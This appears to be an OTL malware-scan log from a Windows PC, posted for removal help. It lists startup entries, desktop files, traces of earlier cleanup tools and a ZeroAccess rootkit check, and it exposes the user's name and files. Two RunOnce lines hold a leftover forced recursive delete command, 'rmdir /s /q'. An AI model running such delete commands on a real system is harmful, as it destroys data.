MOD - [2009/04/11 02:04:15 | 000,113,664 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
MOD - [2009/03/30 04:42:19 | 000,261,632 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
MOD - [2009/03/30 04:42:17 | 002,933,760 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
MOD - [2008/07/03 11:45:00 | 000,032,768 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Content.XmlSerializers.dll
MOD - [2008/07/03 11:42:56 | 000,007,168 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
MOD - [2008/07/03 11:42:54 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
MOD - [2008/07/03 11:42:48 | 000,114,688 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\ECLibrary.dll
MOD - [2008/07/03 11:42:46 | 000,010,240 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
MOD - [2008/07/03 11:42:40 | 000,040,960 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
MOD - [2008/07/03 11:42:40 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
MOD - [2008/07/03 11:42:40 | 000,005,632 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2012/10/21 09:36:16 | 000,121,856 | ---- | M] (ActMask Co.,Ltd - http://www.all2pdf.com)
O4:64bit: - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [HP Health Check Scheduler] c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe (Hewlett-Packard)
O4 - HKLM..\Run: [hpsysdrv] c:\hp\support\hpsysdrv.exe (Hewlett-Packard Company)
O4 - HKLM..\Run: [KBD] C:\hp\KBD\KbdStub.exe ()
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKLM..\Run: [OsdMaestro] c:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe (OsdMaestro)
O4 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000..\Run: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart File not found
O4 - HKLM..\RunOnce: [AvgUninstallURL] C:\Windows\SysWow64\cmd.exe (Microsoft Corporation)
O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk = C:\Program Files (x86)\Tracker\Tracker.exe ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\.DEFAULT\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-18\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000\..Trusted Ranges: Range1 ([http] in Local intranet)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{20DD8DB8-06EA-4D40-A3CC-B974B24382EB}: DhcpNameServer = 192.168.1.254
O18:64bit: - Protocol\Handler\grooveLocalGWS - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\WINDOWS\SysWOW64\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O24 - Desktop BackupWallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/03/28 16:48:54 | 000,000,000 | ---D | C] -- C:\_OTL
[2014/03/28 16:06:07 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 14:59:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\test
[2014/03/28 13:52:14 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Futura Font
[2014/03/27 21:21:09 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Stripe-Larry-Ullman
[2014/03/27 14:10:24 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\WP Page Speed
[2014/03/26 17:54:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\futura
[2014/03/26 16:44:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wppagespeed
[2014/03/26 13:00:55 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Alannah Optimized
[2014/03/25 17:04:26 | 001,038,974 | ---- | C] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:00:52 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\171281
[2014/03/25 15:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wp-whos-online
[2014/03/25 15:31:46 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-likes
[2014/03/25 15:31:30 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-by-email
[2014/03/24 19:00:03 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\PSDs
[2014/03/24 14:28:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Tax Zone Plus
[2014/03/23 21:08:31 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Sumil
[2014/03/23 20:09:56 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Epray V2
[2014/03/21 03:03:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/03/21 02:51:51 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:55:38 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2014/03/21 01:52:24 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2014/03/21 01:52:24 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2014/03/21 01:52:24 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2014/03/21 01:52:19 | 000,000,000 | --SD | C] -- C:\ComboFix
[2014/03/21 01:51:38 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW
[2014/03/21 01:49:11 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/03/21 01:48:40 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2014/03/21 01:32:49 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/03/21 01:20:44 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\VIRUS REMOVAL
[2014/03/21 01:18:41 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VS Revo Group
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/03/18 21:20:48 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Najlepsze Lokaty
[2014/03/17 00:13:07 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Free Bitcoins Online
[2014/03/15 22:10:19 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Master Resale
[2014/03/15 20:07:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Audacity
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/03/14 17:38:40 | 000,000,000 | R--D | C] -- C:\Program Files (x86)\Skype
[2014/03/13 20:56:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/03/13 20:54:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/03/06 12:51:58 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Undercover Tipster
[2014/03/05 14:59:04 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Local\Skype
 
========== Files - Modified Within 30 Days ==========
 
[2014/03/28 18:52:53 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 18:52:53 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 18:46:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/03/28 18:18:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/03/28 16:52:56 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/03/28 16:52:52 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 14:55:18 | 000,003,933 | ---- | M] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:01:34 | 000,365,691 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | M] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:35 | 000,533,740 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/27 23:29:56 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2014/03/27 23:29:08 | 000,002,804 | ---- | M] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | M] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | M] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 18:51:14 | 000,000,416 | ---- | M] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:08 | 000,000,715 | ---- | M] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:29:57 | 000,023,552 | ---- | M] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014/03/26 21:29:54 | 001,713,132 | ---- | M] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | M] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | M] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | M] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | M] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:25 | 000,008,033 | ---- | M] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:12:25 | 004,535,820 | ---- | M] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:35:03 | 000,000,260 | ---- | M] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/26 15:08:33 | 000,010,609 | ---- | M] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:24 | 000,013,706 | ---- | M] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:14 | 000,009,617 | ---- | M] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:08:05 | 000,015,124 | ---- | M] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:55 | 000,011,675 | ---- | M] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | M] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | M] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | M] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | M] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:04:23 | 001,038,974 | ---- | M] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:01:22 | 001,179,320 | ---- | M] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:01 | 001,157,816 | ---- | M] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:37 | 000,053,594 | ---- | M] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:42 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 11:45:18 | 000,136,974 | ---- | M] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:37 | 000,019,846 | ---- | M] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | M] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:01 | 000,011,691 | ---- | M] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:22 | 000,003,895 | ---- | M] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | M] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 02:51:51 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:51:15 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2014/03/21 01:29:24 | 005,290,840 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/03/15 20:07:56 | 000,000,808 | ---- | M] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2014/03/14 03:32:06 | 000,000,766 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk
[2014/03/03 18:45:31 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2014/02/27 03:02:23 | 000,748,424 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/02/27 03:02:23 | 000,637,216 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/02/27 03:02:23 | 000,120,722 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/02/27 03:02:15 | 000,748,424 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
 
========== Files Created - No Company Name ==========
 
[2014/03/28 14:55:18 | 000,003,933 | ---- | C] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:00:51 | 000,365,691 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | C] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:15 | 000,533,740 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/27 23:29:08 | 000,002,804 | ---- | C] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | C] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | C] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 19:07:15 | 001,431,354 | ---- | C] () -- C:\Users\Alan\Desktop\EmailNinja.pdf
[2014/03/27 18:51:14 | 000,000,416 | ---- | C] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:06 | 000,000,715 | ---- | C] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:28:59 | 001,713,132 | ---- | C] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | C] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | C] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | C] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | C] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:24 | 000,008,033 | ---- | C] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:11:56 | 004,535,820 | ---- | C] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:08:26 | 000,010,609 | ---- | C] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:16 | 000,013,706 | ---- | C] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:07 | 000,009,617 | ---- | C] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:07:58 | 000,015,124 | ---- | C] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:47 | 000,011,675 | ---- | C] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | C] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | C] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | C] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | C] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:01:22 | 001,179,320 | ---- | C] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:00 | 001,157,816 | ---- | C] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:35 | 000,053,594 | ---- | C] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:41 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 12:02:15 | 000,000,260 | ---- | C] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/25 11:44:53 | 000,136,974 | ---- | C] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:36 | 000,019,846 | ---- | C] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | C] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:00 | 000,011,691 | ---- | C] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:21 | 000,003,895 | ---- | C] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | C] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 01:52:24 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2014/03/21 01:52:24 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2014/03/21 01:52:24 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2014/03/21 01:52:24 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2014/03/21 01:52:24 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2014/03/21 01:51:10 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2014/03/15 20:07:56 | 000,000,820 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
[2014/03/15 20:07:56 | 000,000,808 | ---- | C] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | C] () -- C:\Users\Public\Desktop\Skype.lnk
[2013/12/20 23:23:07 | 001,391,616 | ---- | C] () -- C:\Windows\SysWow64\ActPDF.dll
[2013/10/01 13:03:01 | 000,000,028 | ---- | C] () -- C:\Users\Alan\.gitconfig
[2013/05/23 22:28:21 | 000,001,456 | ---- | C] () -- C:\Users\Alan\AppData\Local\Adobe Save for Web 13.0 Prefs
[2013/04/25 23:32:54 | 000,748,424 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/04/25 23:32:32 | 000,000,023 | ---- | C] () -- C:\Windows\ODBCINST.INI
[2013/02/24 17:37:10 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2012/09/02 10:59:14 | 001,036,288 | ---- | C] () -- C:\Windows\SysWow64\lxdwdrs.dll
[2012/09/02 10:59:14 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\lxdwcaps.dll
[2012/09/02 10:59:14 | 000,069,632 | ---- | C] () -- C:\Windows\SysWow64\lxdwcnv4.dll
[2012/07/15 12:18:24 | 000,023,552 | ---- | C] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/06/08 22:25:27 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2011/05/13 13:08:58 | 000,000,680 | ---- | C] () -- C:\Users\Alan\AppData\Local\d3d9caps.dat
[2011/03/29 09:38:49 | 000,013,078 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\wklnhst.dat
[2011/03/28 12:38:47 | 000,015,812 | ---- | C] () -- C:\Users\Alan\danube.zip
[2011/03/28 12:37:46 | 000,023,841 | ---- | C] () -- C:\Users\Alan\bedizen.zip
[2011/03/26 17:58:01 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
 
========== ZeroAccess Check ==========
 
[2006/11/02 15:30:40 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012/06/08 17:59:03 | 012,899,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012/06/08 17:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/04/11 07:11:14 | 000,891,392 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\fastprox.dll -- [2009/04/11 06:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2008/01/21 02:50:58 | 000,513,024 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\wbemess.dll
 
